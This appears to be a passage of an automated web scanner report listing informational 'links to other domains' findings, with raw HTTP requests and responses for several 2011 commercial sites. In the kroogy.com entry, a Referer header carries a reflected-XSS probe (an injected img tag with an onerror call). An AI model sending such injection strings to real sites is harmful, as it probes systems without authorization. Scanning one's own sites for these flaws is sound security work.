X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=njkcpvmavkvinriptaaozg45; path=/; HttpOnly
Set-Cookie: URLParams=id=78725&LangType=1033&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1; path=/
Date: Sun, 24 Apr 2011 03:10:16 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link rel="SHORTC
...[SNIP]...
<div class="footer_right" style="margin-top:22px;">
        <a href="http://seal.controlcase.com/index.php?page=showCert&cId=3063048179" target="_blank"><img src="/images/PCI_logo.gif"
        alt="PCI Compliant by ControlCase" hspace="12" style="padding-bottom:3px;" border="0" />
...[SNIP]...
<!-- ad.com -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=intersct_cs=1&betq=3000=372741" width="1" height="1" alt="" />
<!-- ad.com -->
<!-- id theft terms for ad.com -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=intersectio_cs=1&betq=12579=431212" width="1" height="1" alt="" />
<!-- END id theft terms for ad.com -->
...[SNIP]...
</script>
<script src="http://leadback.netseer.com/dsatserving2/scripts/netseerads.js" type="text/javascript"></script>
...[SNIP]...

23.532. http://www.identityguard.com/ipages/le33/letp30daysfree33.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /ipages/le33/letp30daysfree33.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ipages/le33/letp30daysfree33.html?mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1

Response

HTTP/1.1 200 OK
Content-Length: 7637
Content-Type: text/html
Last-Modified: Tue, 08 Mar 2011 16:56:58 GMT
Accept-Ranges: bytes
ETag: "f19bfd6b1ddcb1:20a9"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 20:10:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<!-- ad.com -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=intersct_cs=1&betq=3000=372741" width="1" height="1" border="0" alt="" />
<!-- ad.com -->
<!-- id theft terms for ad.com -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=intersectio_cs=1&betq=12579=431212" width="1" height="1" alt="" />
<!-- END id theft terms for ad.com -->
...[SNIP]...
</script>
<script src="http://leadback.netseer.com/dsatserving2/scripts/netseerads.js" type="text/javascript"></script>
...[SNIP]...

23.533. http://www.identityguard.com/ipages/le4/letp30daysfree1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /ipages/le4/letp30daysfree1.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 13510
Content-Type: text/html
Last-Modified: Tue, 08 Mar 2011 16:56:16 GMT
Accept-Ranges: bytes
ETag: "69d26fbdb1ddcb1:1e7c"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 03:09:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <titl
...[SNIP]...
<!-- ad.com -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=intersct_cs=1&betq=3000=372741" width="1" height="1" border="0" alt="" />
<!-- ad.com -->
<!-- id theft terms for ad.com -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=intersectio_cs=1&betq=12579=431212" width="1" height="1" alt="" />
<!-- END id theft terms for ad.com -->
...[SNIP]...
</script>
<script src="http://leadback.netseer.com/dsatserving2/scripts/netseerads.js" type="text/javascript"></script>
...[SNIP]...

23.534. http://www.identitymanagement.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identitymanagement.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg HTTP/1.1
Host: www.identitymanagement.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 19:45:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Length: 11500

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Identity Management, Active Directory Administration, and Secure Workflow Automation</title>
<meta http-equiv="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/styles.css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</a>
                   <a href="http://www.slideshare.net/TDNF" class="follow_us_icons" target="_blank" title="slideshare"><img src="images/slideshare_icon.png" border="0" alt="The Dot Net Factory Presentations Channel - Slideshare"></a>
                   <a href="http://twitter.com/TDNF" class="follow_us_icons" target="_blank" title="twitter"><img src="images/twitter_icon.png" border="0" alt="The Dot Net Factory (TDNF) on Twitter"></a>
                   <a href="http://www.youtube.com/empowerid" target="_blank" title="YouTube"><img src="images/youtube_icon.png" border="0" alt="EmpowerID's YouTube Channel">
...[SNIP]...
<td style="color:#FFFFFF;font-size:11px;text-align:center;font-weight:bold;">
Looking for an AD Password Reset and Corporate White Pages Solution that deploys in minutes? Check out the <a style="color:#00CCFF;"target="new" href="http://www.adselfservicesuite.com">AD Self-Service Suite</a>
...[SNIP]...
</SCRIPT> <SCRIPT SRC="http://sniff.visistat.com/sniff.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s41.sitemeter.com/js/counter.js?site=s41TheDotNetFactory">
</script>
<noscript>
<a href="http://s41.sitemeter.com/stats.asp?site=s41TheDotNetFactory" target="_top">
<img src="http://s41.sitemeter.com/meter.asp?site=s41TheDotNetFactory" alt="Site Meter" border="0"/></a>
...[SNIP]...

23.535. http://www.infusionsoft.com/sites/all/themes/infusion/js/jquery.tools.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /sites/all/themes/infusion/js/jquery.tools.min.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sites/all/themes/infusion/js/jquery.tools.min.js?0 HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; ISFunnel=ms

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 22 Apr 2010 23:17:35 GMT
ETag: "514ccf-9b10-484db840d21c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 39696

/*
* jquery.tools 1.1.2 - The missing UI library for the Web
*
* [tools.tooltip-1.1.3, tools.scrollable-1.1.2, tools.overlay-1.1.2, tools.overlay.gallery-1.0.0, tools.expose-1.0.5]
*
* Copyrigh
...[SNIP]...
<p>Download latest version from <a href='http://www.adobe.com/go/getflashplayer'>here</a>
...[SNIP]...

23.536. http://www.kqzyfj.com/click-1911961-10751987  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kqzyfj.com
Path:   /click-1911961-10751987

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /click-1911961-10751987?sid=gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04CD1&url=https%3A%2F%2Fwww.econsumer.equifax.com%2Fconsumer%2Flanding.ehtml%3F%255estart%3D%26companyName%3Dcj_esnp3r HTTP/1.1
Host: www.kqzyfj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.kqzyfj.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:25:32 GMT
Location: http://www.apmebf.com/dn115ox54N/x38/MLSQMUTS/MUMMURM/L/L/L?i=kzpk%3DnpkGh%2Bpklu0p05%2B0olm0%2Bylzv1yjl_vyklypunAB--9788-7B-9A--97-87-7BJK8%261ys%3Do00wz%25AH%259M%259M333.ljvuz1tly.lx1pmh4.jvt%259Mjvuz1tly%259Mshukpun.lo0ts%25AM%259CClz0hy0%25AK%259Djvtwhu5Uhtl%25AKjq_lzuwAy<<o00w%3A%2F%2F333.rx65mq.jvt%3AF7%2Fjspjr-8G88GD8-87EC8GFE<<N<<
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:25:32 GMT
Content-Length: 837

<html>
<head><meta http-equiv="redirect" content="http://www.apmebf.com/dn115ox54N/x38/MLSQMUTS/MUMMURM/L/L/L?i=kzpk%3DnpkGh%2Bpklu0p05%2B0olm0%2Bylzv1yjl_vyklypunAB--9788-7B-9A--97-87-7BJK8%261ys%3Do
...[SNIP]...
<body>The URL has moved <a href="http://www.apmebf.com/dn115ox54N/x38/MLSQMUTS/MUMMURM/L/L/L?i=kzpk%3DnpkGh%2Bpklu0p05%2B0olm0%2Bylzv1yjl_vyklypunAB--9788-7B-9A--97-87-7BJK8%261ys%3Do00wz%25AH%259M%259M333.ljvuz1tly.lx1pmh4.jvt%259Mjvuz1tly%259Mshukpun.lo0ts%25AM%259CClz0hy0%25AK%259Djvtwhu5Uhtl%25AKjq_lzuwAy&lt;&lt;o00w%3A%2F%2F333.rx65mq.jvt%3AF7%2Fjspjr-8G88GD8-87EC8GFE&lt;&lt;N&lt;&lt;">here</a>
...[SNIP]...

23.537. http://www.kqzyfj.com/click-1911961-10751987  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kqzyfj.com
Path:   /click-1911961-10751987

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /click-1911961-10751987?sid=gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04CD1&url=https%3A%2F%2Fwww.econsumer.equifax.com%2Fconsumer%2Flanding.ehtml%3F%255estart%3D%26companyName%3Dcj_esnp3r HTTP/1.1
Host: www.kqzyfj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.kqzyfj.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:07 GMT
Location: http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3<<t551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ<<S<<
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:07 GMT
Content-Length: 835

<html>
<head><meta http-equiv="redirect" content="http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5
...[SNIP]...
<body>The URL has moved <a href="http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3&lt;&lt;t551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ&lt;&lt;S&lt;&lt;">here</a>
...[SNIP]...

23.538. http://www.kroogy.com/search/amazon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kroogy.com
Path:   /search/amazon

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/amazon?search=mp3&type=Amazon&fl=0 HTTP/1.1
Host: www.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/index/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=3d7f14c510eede66cdde05b384066fc0; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 71829

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
function showcheckbox()
{
if(document.getElementByI
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com/Frigidaire-WF2CB-PureSource2-Filtration-System/dp/B0032AND0E%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB0032AND0E" alt="Miele Style FJM Vacuum Bags Includes 4 bags + 2 Filters" title="Miele Style FJM Vacuum Bags Includes 4 bags + 2 Filters">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/41Nw%2BQ5JxyL._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Frigidaire-WF2CB-PureSource2-Filtration-System/dp/B0032AND0E%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB0032AND0E">
Miele Style FJM Vacuum Bags Includes 4 bags + 2 Filters</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Frigidaire-WF2CB-PureSource2-Filtration-System/dp/B0032AND0E%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB0032AND0E" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com/Cloud-Sleep-Sheep-Soothing-Sounds/dp/B000GKWA66%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB000GKWA66" alt="Cloud b Sleep Sheep - Four Soothing Sounds From Nature" title="Cloud b Sleep Sheep - Four Soothing Sounds From Nature">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/41qqb5TqHsL._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Cloud-Sleep-Sheep-Soothing-Sounds/dp/B000GKWA66%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB000GKWA66">
Cloud b Sleep Sheep - Four Soothing Sounds From Nature</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Cloud-Sleep-Sheep-Soothing-Sounds/dp/B000GKWA66%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB000GKWA66" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com/Peter-Wolf-Disney-Favorite-Stories/dp/6302961696%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3D6302961696" alt="Peter &amp; the Wolf Disney Favorite Stories [VHS]" title="Peter &amp; the Wolf Disney Favorite Stories [VHS]">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/5105YD26PBL._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Peter-Wolf-Disney-Favorite-Stories/dp/6302961696%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3D6302961696">
Peter &amp; the Wolf Disney Favorite Stories [VHS]</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Peter-Wolf-Disney-Favorite-Stories/dp/6302961696%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3D6302961696" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com/Donut-Resurrection-Celebration-Importance-Christian/dp/B00000FACB%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB00000FACB" alt="The Donut Man The Resurrection Celebration ; Learn the Importance of Jesus Resurrection ; Christian [VHS]" title="The Donut Man The Resurrection Celebration ; Learn the Importance of Jesus Resurrection ; Christian [VHS]">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/213KK3CGAYL._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Donut-Resurrection-Celebration-Importance-Christian/dp/B00000FACB%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB00000FACB">
The Donut Man The Resurrection Celebration ; Learn the Importance of Jesus Resurrection ; Christian [VHS]</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Donut-Resurrection-Celebration-Importance-Christian/dp/B00000FACB%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB00000FACB" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com/Sing-VHS-Lorraine-Bracco/dp/6301415833%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3D6301415833" alt="Sing [VHS]" title="Sing [VHS]">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/214DA0Q7SKL._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Sing-VHS-Lorraine-Bracco/dp/6301415833%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3D6301415833">
Sing [VHS]</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Sing-VHS-Lorraine-Bracco/dp/6301415833%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3D6301415833" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com/Howard-Leight-R-01526-Electronic-Earmuff/dp/B001T7QJ9O%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB001T7QJ9O" alt="Howard Leight R-01526 Impact Sport Electronic Earmuff" title="Howard Leight R-01526 Impact Sport Electronic Earmuff">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/41ShugcEeRL._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Howard-Leight-R-01526-Electronic-Earmuff/dp/B001T7QJ9O%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB001T7QJ9O">
Howard Leight R-01526 Impact Sport Electronic Earmuff</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Howard-Leight-R-01526-Electronic-Earmuff/dp/B001T7QJ9O%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB001T7QJ9O" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com//dp/B004HQLDO0%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB004HQLDO0" alt="Les Miserables: The 25th Anniversary Concert" title="Les Miserables: The 25th Anniversary Concert">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/510b9Ma307L._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com//dp/B004HQLDO0%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB004HQLDO0">
Les Miserables: The 25th Anniversary Concert</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com//dp/B004HQLDO0%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB004HQLDO0" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com/Love-Other-Drugs-Jake-Gyllenhaal/dp/B004L3AR0K%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB004L3AR0K" alt="Love &amp; Other Drugs" title="Love &amp; Other Drugs">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/51UClUiAxML._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Love-Other-Drugs-Jake-Gyllenhaal/dp/B004L3AR0K%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB004L3AR0K">
Love &amp; Other Drugs</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Love-Other-Drugs-Jake-Gyllenhaal/dp/B004L3AR0K%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB004L3AR0K" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
